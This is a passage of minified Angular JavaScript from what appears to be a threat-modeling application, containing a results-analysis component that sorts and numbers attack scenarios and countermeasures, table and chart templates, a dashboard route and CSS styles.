vn.ToString(e)}GetMitigationStates(){return Sl.GetMitigationStates()}GetMitigationStateName(e){return Sl.ToString(e)}GetLMHValues(){return An.GetKeys()}GetLMHName(e){return An.ToString(e)}OpenContextMenu(e,i){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:i},this.matMenuTrigger.openMenu()}ResetNumbers(e){let i=[];e instanceof Rc?i=[...this.dataService.Project.GetAttackScenariosApplicable().sort((n,r)=>Number(n.Number)-Number(r.Number)),...this.dataService.Project.GetAttackScenariosNotApplicable().sort((n,r)=>Number(n.Number)-Number(r.Number))]:e instanceof Jl&&(i=[...this.dataService.Project.GetCountermeasuresApplicable().sort((n,r)=>Number(n.Number)-Number(r.Number)),...this.dataService.Project.GetCountermeasuresNotApplicable().sort((n,r)=>Number(n.Number)-Number(r.Number))]);for(let n=0;n<i.length;n++)i[n].Number=(n+1).toString()}ResetReorderNumbers(e){if(e instanceof Rc){const i=this.dataService.Project.GetAttackScenarios(),n=this.dataService.Project.GetAttackScenariosApplicable(),r=this.dataService.Project.GetAttackScenariosNotApplicable(),c=(d,T)=>{var k,q,Y,te;const pe=(Fe,Ne)=>Fe>=0&&Ne>=0?Number(Fe)>Number(Ne)?-1:Number(Fe)<Number(Ne)?1:0:Fe?-1:1;let Re=0;if(d.ViewID!=T.ViewID){const Fe={CTX:0,UC:1,HW:2,DF:3},Ne=this.dataService.Project.GetView(d.ViewID),et=this.dataService.Project.GetView(T.ViewID);Re=Ne instanceof ns&&et instanceof ns?Fe[Ne.DiagramType]<Fe[et.DiagramType]?-1:Fe[Ne.DiagramType]==Fe[et.DiagramType]?0:1:Ne instanceof ns?Fe[Ne.DiagramType]<3?-1:1:et instanceof ns?Fe[et.DiagramType]<3?1:-1:Ne.ComponentTypeID==et.ComponentTypeID?0:Ne.ComponentTypeID==zr.Software?-1:1,0==Re&&(Re=Ne.Name.localeCompare(et.Name))}return 0==Re&&(Re=pe(d.Risk,T.Risk)),0==Re&&(Re=pe(d.Severity,T.Severity)),0==Re&&(Re=pe(d.ThreatState,T.ThreatState)),0==Re&&(null===(k=d.ScoreCVSS)||void 0===k?void 0:k.Score)&&(null===(q=T.ScoreCVSS)||void 0===q?void 0:q.Score)?Re=pe(d.ScoreCVSS,T.ScoreCVSS):0==Re&&(null===(Y=d.ScoreCVSS)||void 0===Y?void 0:Y.Score)?Re=-1:0==Re&&(null===(te=T.ScoreCVSS)||void 0===te?void 0:te.Score)&&(Re=1),0==Re&&d.Target&&T.Target&&(Re=d.Target.Name.localeCompare(T.Target.Name)),0==Re&&(Re=pe(T.Number,d.Number)),Re};n.sort((d,T)=>c(d,T));for(let d=0;d<n.length;d++)this.dataService.Project.MoveItemAttackScenario(i.indexOf(n[d]),d),n[d].Number=(d+1).toString();r.sort((d,T)=>c(d,T));for(let d=0;d<r.length;d++)this.dataService.Project.MoveItemAttackScenario(i.indexOf(r[d]),n.length+d),r[d].Number=(n.length+d+1).toString();this.AttackScenarios=this.dataService.Project.GetAttackScenariosApplicable().filter(d=>d.MappingState!=zn.Removed)}else if(e instanceof Jl){const i=this.dataService.Project.GetCountermeasures(),n=this.dataService.Project.GetCountermeasuresApplicable(),r=this.dataService.Project.GetCountermeasuresNotApplicable(),c=(d,T)=>{const k=(Y,te)=>Y>=0&&te>=0?Number(Y)>Number(te)?-1:Number(Y)<Number(te)?1:0:Y?-1:1;let q=0;if(d.ViewID!=T.ViewID){const Y={CTX:0,UC:1,HW:2,DF:3},te=this.dataService.Project.GetView(d.ViewID),pe=this.dataService.Project.GetView(T.ViewID);q=te instanceof ns&&pe instanceof ns?Y[te.DiagramType]<Y[pe.DiagramType]?-1:Y[te.DiagramType]==Y[pe.DiagramType]?0:1:te instanceof ns?Y[te.DiagramType]<3?-1:1:pe instanceof ns?Y[pe.DiagramType]<3?1:-1:te.ComponentTypeID==pe.ComponentTypeID?0:te.ComponentTypeID==zr.Software?-1:1,0==q&&(q=te.Name.localeCompare(pe.Name))}return 0==q&&(q=k(d.MitigationState,T.MitigationState)),0==q&&d.Targets&&T.Targets&&(q=d.Targets.map(Y=>Y.Name).join(", ").localeCompare(T.Targets.map(Y=>Y.Name).join(", "))),0==q&&d.MitigationProcess&&T.MitigationProcess&&(q=k(d.MitigationProcess.Number,T.MitigationProcess.Number)),0==q&&(q=k(T.Number,d.Number)),q};n.sort((d,T)=>c(d,T));for(let d=0;d<n.length;d++)this.dataService.Project.MoveItemCountermeasures(i.indexOf(n[d]),d),n[d].Number=(d+1).toString();r.sort((d,T)=>c(d,T));for(let d=0;d<r.length;d++)this.dataService.Project.MoveItemCountermeasures(i.indexOf(r[d]),d),r[d].Number=(n.length+d+1).toString();this.Countermeasures=this.dataService.Project.GetCountermeasuresApplicable().filter(d=>d.MappingState!=zn.Removed)}}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn),Ee(_r),Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["app-results-analysis"]],viewQuery:function(e,i){if(1&e&&(Mi(po,5),Mi(y1t,5),Mi(b1t,5),Mi(xc,5,mi)),2&e){let n;Vt(n=Bt())&&(i.matMenuTrigger=n.first),Vt(n=Bt())&&(i.sortThreats=n.first),Vt(n=Bt())&&(i.sortCountermeasures=n.first),Vt(n=Bt())&&(i.rows=n)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,$c)},decls:212,vars:86,consts:[["direction","vertical","unit","percent",3,"gutterSize","restrictMove","dragEnd"],["id","diagramContainer",3,"size","order"],[2,"margin","10px"],["mat-button","",2,"vertical-align","middle","min-width","30px","padding","0px",3,"click"],["style","display: inline; margin-left: 5px;","mode","indeterminate",3,"diameter",4,"ngIf"],[2,"font-size","small","display","flex","position","relative","overflow","auto"],[3,"marginLeft",4,"ngFor","ngForOf"],[2,"display","flex"],["mat-button","",3,"click"],[3,"size","order"],["direction","horizontal","unit","percent",3,"gutterSize","restrictMove","dragEnd"],[2,"height","100%","display","grid","align-content","start"],[2,"margin-left","5px","margin-top","2px"],["matInput","",1,"filterInput",3,"spellcheck","placeholder","keyup"],[2,"overflow","auto"],["mat-table","","matSort","","matSortActive","number","matSortDirection","asc","matSortDisableClear","",2,"width","100%",3,"dataSource"],["threattable","matSort"],["matColumnDef","number"],["mat-header-cell","","mat-sort-header","",4,"matHeaderCellDef"],["mat-cell","",4,"matCellDef"],["matColumnDef","name"],["matColumnDef","elements"],["mat-cell","",3,"selected-cell",4,"matCellDef"],["matColumnDef","view"],["matColumnDef","severity"],["matColumnDef","risk"],["matColumnDef","status"],["matColumnDef","more"],["mat-header-cell","",4,"matHeaderCellDef"],["mat-header-row","","style","height: 30px;",4,"matHeaderRowDef","matHeaderRowDefSticky"],["mat-row","",3,"id","selected-entry","click","dblclick","contextmenu",4,"matRowDef","matRowDefColumns"],["class","mat-row",4,"matNoDataRow"],["countermeasuretable","matSort"],["matColumnDef","targets"],["matColumnDef","progress"],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["rightMenu","matMenu"],["matMenuContent",""],["mode","indeterminate",2,"display","inline","margin-left","5px",3,"diameter"],[2,"height","400px",3,"diagram"],["mat-header-cell","","mat-sort-header",""],["mat-cell",""],[2,"width","80px",3,"ngModel","ngModelChange","change"],[3,"value"],[3,"value",4,"ngFor","ngForOf"],[2,"width","80px","pointer-events","none",3,"ngModel","ngModelChange"],[2,"width","130px",3,"ngModel","ngModelChange","change"],["mat-header-cell",""],["matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-header-row","",2,"height","30px"],["mat-row","",3,"id","click","dblclick","contextmenu"],[1,"mat-row"],["colspan","9",1,"mat-cell",3,"contextmenu"],["class","disable","color","primary","style","width: 100px; margin-right: 3px;",3,"value",4,"ngIf"],["color","primary",1,"disable",2,"width","100px","margin-right","3px",3,"value"],["style","margin-left: 20px; margin-right: 20px;",4,"ngIf"],["mat-menu-item","",3,"disabled","click"],[2,"margin-left","20px","margin-right","20px"]],template:function(e,i){if(1&e&&(m(0,"as-split",0),he("dragEnd",function(r){return i.OnSplitSizeChange(r,1)}),s(1,"\n  "),m(2,"as-split-area",1),s(3,"\n    "),m(4,"div",2),s(5,"\n      "),m(6,"h2"),s(7,"\n        "),m(8,"button",3),he("click",function(){return i.dialog.OpenModelInfoDialog()}),s(9,"\n          "),m(10,"mat-icon"),s(11,"source"),u(),s(12,"\n        "),u(),s(13),ne(14,M1t,1,1,"mat-progress-spinner",4),s(15,"\n      "),u(),s(16,"\n      "),m(17,"div",5),s(18,"\n        "),ne(19,v1t,4,3,"div",6),s(20,"\n        "),m(21,"div",7),s(22,"\n          "),m(23,"button",8),he("click",function(){return i.OpenTagCharts()}),s(24,"\n            "),m(25,"mat-icon"),s(26,"add_circle"),u(),s(27,"\n          "),u(),s(28,"\n        "),u(),s(29,"\n      "),u(),s(30,"\n    "),u(),s(31,"\n  "),u(),s(32,"\n  "),m(33,"as-split-area",9),s(34,"\n    "),m(35,"as-split",10),he("dragEnd",function(r){return i.OnSplitSizeChange(r,2)}),s(36,"\n      "),m(37,"as-split-area",9),s(38,"\n        "),m(39,"div",11),s(40,"\n          "),m(41,"div"),s(42,"\n            "),m(43,"span",12),s(44),oe(45,"translate"),oe(46,"translate"),u(),s(47,"\n            "),m(48,"input",13),he("keyup",function(r){return i.ApplyThreatFilter(r)}),oe(49,"translate"),u(),s(50,"\n          "),u(),s(51,"\n          "),m(52,"div",14),s(53,"\n            "),m(54,"table",15,16),s(56,"\n              "),bt(57,17),s(58,"\n                "),ne(59,A1t,3,3,"th",18),s(60,"\n                "),ne(61,T1t,2,1,"td",19),s(62,"\n              "),Mt(),s(63,"\n              "),bt(64,20),s(65,"\n                "),ne(66,E1t,3,3,"th",18),s(67,"\n                "),ne(68,D1t,2,1,"td",19),s(69,"\n              "),Mt(),s(70,"\n              "),bt(71,21),s(72,"\n                "),ne(73,x1t,3,3,"th",18),s(74,"\n                "),ne(75,w1t,2,3,"td",22),s(76,"\n              "),Mt(),s(77,"\n              "),bt(78,23),s(79,"\n                "),ne(80,I1t,3,3,"th",18),s(81,"\n                "),ne(82,R1t,2,1,"td",19),s(83,"\n              "),Mt(),s(84,"\n              "),bt(85,24),s(86,"\n                "),ne(87,S1t,3,3,"th",18),s(88,"\n                "),ne(89,P1t,11,6,"td",19),s(90,"\n              "),Mt(),s(91,"\n              "),bt(92,25),s(93,"\n                "),ne(94,O1t,3,3,"th",18),s(95,"\n                "),ne(96,L1t,7,2,"td",19),s(97,"\n              "),Mt(),s(98,"\n              "),bt(99,26),s(100,"\n                "),ne(101,z1t,3,3,"th",18),s(102,"\n                "),ne(103,F1t,7,2,"td",19),s(104,"\n              "),Mt(),s(105,"\n              "),bt(106,27),s(107,"\n                "),ne(108,V1t,2,0,"th",28),s(109,"\n                "),ne(110,B1t,6,3,"td",19),s(111,"\n              "),Mt(),s(112,"\n          \n              "),ne(113,H1t,1,0,"tr",29),s(114,"\n              "),ne(115,U1t,2,3,"tr",30),s(116,"\n              "),ne(117,q1t,6,3,"tr",31),s(118,"\n            "),u(),s(119,"\n          "),u(),s(120,"\n        "),u(),s(121,"\n      "),u(),s(122,"\n      "),m(123,"as-split-area",9),s(124,"\n        "),m(125,"div",11),s(126,"\n          "),m(127,"div"),s(128,"\n            "),m(129,"span",12),s(130),oe(131,"translate"),oe(132,"translate"),u(),s(133,"\n            "),m(134,"input",13),he("keyup",function(r){return i.ApplyCountermeasureFilter(r)}),oe(135,"translate"),u(),s(136,"\n          "),u(),s(137,"\n          "),m(138,"div",14),s(139,"\n            "),m(140,"table",15,32),s(142,"\n              "),bt(143,17),s(144,"\n                "),ne(145,G1t,3,3,"th",18),s(146,"\n                "),ne(147,j1t,2,1,"td",19),s(148,"\n              "),Mt(),s(149,"\n              "),bt(150,20),s(151,"\n                "),ne(152,Q1t,3,3,"th",18),s(153,"\n                "),ne(154,$1t,2,1,"td",19),s(155,"\n              "),Mt(),s(156,"\n              "),bt(157,33),s(158,"\n                "),ne(159,K1t,3,3,"th",18),s(160,"\n                "),ne(161,X1t,2,3,"td",22),s(162,"\n              "),Mt(),s(163,"\n              "),bt(164,23),s(165,"\n                "),ne(166,Y1t,3,3,"th",18),s(167,"\n                "),ne(168,J1t,2,1,"td",19),s(169,"\n              "),Mt(),s(170,"\n              "),bt(171,34),s(172,"\n                "),ne(173,Z1t,3,3,"th",28),s(174,"\n                "),ne(175,t2t,4,1,"td",19),s(176,"\n              "),Mt(),s(177,"\n              "),bt(178,26),s(179,"\n                "),ne(180,i2t,3,3,"th",18),s(181,"\n                "),ne(182,n2t,7,2,"td",19),s(183,"\n              "),Mt(),s(184,"\n              "),bt(185,27),s(186,"\n                "),ne(187,o2t,2,0,"th",28),s(188,"\n                "),ne(189,r2t,6,3,"td",19),s(190,"\n              "),Mt(),s(191,"\n          \n              "),ne(192,s2t,1,0,"tr",29),s(193,"\n              "),ne(194,c2t,2,3,"tr",30),s(195,"\n              "),ne(196,l2t,6,3,"tr",31),s(197,"\n            "),u(),s(198,"\n          "),u(),s(199,"\n        "),u(),s(200,"\n      "),u(),s(201,"\n      "),it(202,"div",35),s(203," \n      "),m(204,"mat-menu",null,36),s(206," \n        "),ne(207,u2t,35,14,"ng-template",37),s(208," \n      "),u(),s(209," \n    "),u(),s(210,"\n  "),u(),s(211,"\n"),u()),2&e){const n=Ti(205);V("gutterSize",3)("restrictMove",!0),C(2),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("size",i.GetSplitSize(1,0,50))("order",1),C(11),ct("\n        ",null==i.dataService.Project?null:i.dataService.Project.Name,"\n        "),C(1),V("ngIf",i.isUpdatingDiagrams),C(5),V("ngForOf",i.diagrams),C(14),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("size",i.GetSplitSize(1,1,"*"))("order",2),C(2),V("gutterSize",3)("restrictMove",!0),C(2),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("size",i.GetSplitSize(2,0,50))("order",1),C(7),Y_("",re(45,74,"pages.dashboard.ThreatOverview"),": ",i.AttackScenarios.length," ",re(46,76,"general.AttackScenarios"),""),C(4),ri("color",i.theme.IsDarkMode?"white":"black"),Ct("bg-color-light2",!i.theme.IsDarkMode)("bg-color-dark2",i.theme.IsDarkMode),at("placeholder",re(49,78,"pages.modeling.filter")),V("spellcheck",i.dataService.HasSpellCheck),C(6),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("dataSource",i.dataSourceThreats),C(59),V("matHeaderRowDef",i.displayedThreatColumns)("matHeaderRowDefSticky",!0),C(2),V("matRowDefColumns",i.displayedThreatColumns),C(8),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("size",i.GetSplitSize(2,1,"*"))("order",2),C(7),Y_("",re(131,80,"pages.dashboard.CountermeasureOverview"),": ",i.Countermeasures.length," ",re(132,82,"general.Countermeasures"),""),C(4),ri("color",i.theme.IsDarkMode?"white":"black"),Ct("bg-color-light2",!i.theme.IsDarkMode)("bg-color-dark2",i.theme.IsDarkMode),at("placeholder",re(135,84,"pages.modeling.filter")),V("spellcheck",i.dataService.HasSpellCheck),C(6),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("dataSource",i.dataSourceCountermeasures),C(52),V("matHeaderRowDef",i.displayedCountermeasureColumns)("matHeaderRowDefSticky",!0),C(2),V("matRowDefColumns",i.displayedCountermeasureColumns),C(8),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),V("matMenuTriggerFor",n)}},styles:[".primary-color[_ngcontent-%COMP%], .selected-entry[_ngcontent-%COMP%]   td[_ngcontent-%COMP%], .selected-cell[_ngcontent-%COMP%], .selected-item[_ngcontent-%COMP%]   td[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.primary-color[_ngcontent-%COMP%], .selected-entry[_ngcontent-%COMP%]   td[_ngcontent-%COMP%], .selected-cell[_ngcontent-%COMP%], .selected-item[_ngcontent-%COMP%]   td[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}tr[_ngcontent-%COMP%]{height:30px!important}th.mat-header-cell[_ngcontent-%COMP%]:first-of-type, td.mat-cell[_ngcontent-%COMP%]:first-of-type, td.mat-footer-cell[_ngcontent-%COMP%]:first-of-type{padding-left:5px!important}th.mat-header-cell[_ngcontent-%COMP%]:last-of-type, td.mat-cell[_ngcontent-%COMP%]:last-of-type, td.mat-footer-cell[_ngcontent-%COMP%]:last-of-type{padding-right:5px!important}.removed-item[_ngcontent-%COMP%]{opacity:.3}.tools[_ngcontent-%COMP%]{display:block;float:left;height:27px;width:calc(100% - 20px);font-size:12px}.toolBtn[_ngcontent-%COMP%]{width:30px;min-width:30px;padding:0;line-height:25px;margin-left:5px}.toolBtn-Selected[_ngcontent-%COMP%]{background-color:#ffffff26}.filterInput[_ngcontent-%COMP%]{margin-left:5px;width:200px;height:25px}th[_ngcontent-%COMP%], td[_ngcontent-%COMP%]{font-size:small}.filterInput[_ngcontent-%COMP%]{float:right;margin-right:5px;margin-top:2px;width:200px;height:25px}.disable[_ngcontent-%COMP%]{pointer-events:none}"]}),t})();const h2t=[{path:"dashboard",component:(()=>{class t{constructor(e,i,n,r){this.theme=e,this.dataService=i,this.translate=n,this.router=r,this.dataService.Project||this.router.navigate(["/home"],{queryParams:{origin:"dashboard"}})}ngOnInit(){}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Sn),Ee(Oo))},t.\u0275cmp=Wt({type:t,selectors:[["app-dashboard"]],decls:18,vars:4,consts:[[1,"website-container"],[1,"drawer-container"],["mode","side","opened","",2,"border-right-width","0px"],["selectedRoute","/dashboard",2,"width","100%","height","100%"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"mat-drawer-container",1),s(3,"\n    "),m(4,"mat-drawer",2),s(5,"\n      "),it(6,"app-side-nav",3),s(7,"\n    "),u(),s(8,"\n\n    "),m(9,"mat-drawer-content"),s(10,"\n      "),it(11,"app-results-analysis"),s(12,"\n    "),u(),s(13,"\n  "),u(),s(14,"\n  "),it(15,"app-status-bar"),s(16,"\n"),u(),s(17,"\n")),2&e&&(C(9),Ct("splitter-light2",!i.theme.IsDarkMode)("splitter-dark2",i.theme.IsDarkMode))},dependencies:[_u,gu,Nd,pf,_f,Cf],styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}"]}),t})()}];let f2t=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,Ms.forChild(h2t),Ms]}),t})();function p2t(t,a){if(1&t&&(bt(0),s(1,"\n  "),m(2,"div"),s(3,"\n    "),m(4,"h3",1),s(5),u(),s(6,"\n    \n    "),m(7,"ngx-charts-bar-vertical-stacked",2),s(8,"\n    "),u(),s(9,"\n  "),u(),s(10,"\n"),Mt()),2&t){const e=B();C(5),ke(e.diagram.xAxisLabel),C(2),Ct("chartDark",e.theme.IsDarkMode),V("scheme",e.diagram.scheme)("view",e.diagram.view)("results",e.diagram.results)("xAxisLabel",e.diagram.xAxisLabel)("yAxisLabel",e.diagram.yAxisLabel)("yAxisTickFormatting",e.CutDigits)("xAxis",!0)("yAxis",!0)("showXAxisLabel",!1)("showYAxisLabel",!0)("animations",!0)("legend",!0)("legendPosition",e.legendPosition)("barPadding",3)}}let SZ=(()=>{class t{constructor(e,i){this.theme=e,this.elRef=i,this.legendPosition=Su.Below}ngOnInit(){}CutDigits(e){return e.toFixed(0)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["app-results-chart"]],inputs:{diagram:"diagram"},decls:1,vars:1,consts:[[4,"ngIf"],[2,"text-align","center","margin-top","0px","margin-bottom","5px"],["legendTitle","",3,"scheme","view","results","xAxisLabel","yAxisLabel","yAxisTickFormatting","xAxis","yAxis","showXAxisLabel","showYAxisLabel","animations","legend","legendPosition","barPadding"]],template:function(e,i){1&e&&ne(0,p2t,11,17,"ng-container",0),2&e&&V("ngIf",i.diagram)},dependencies:[Ri,S6e],styles:[".primary-color[_ngcontent-%COMP%], .chartDark[_ngcontent-%COMP%]     .chart-legend .legend-label .active 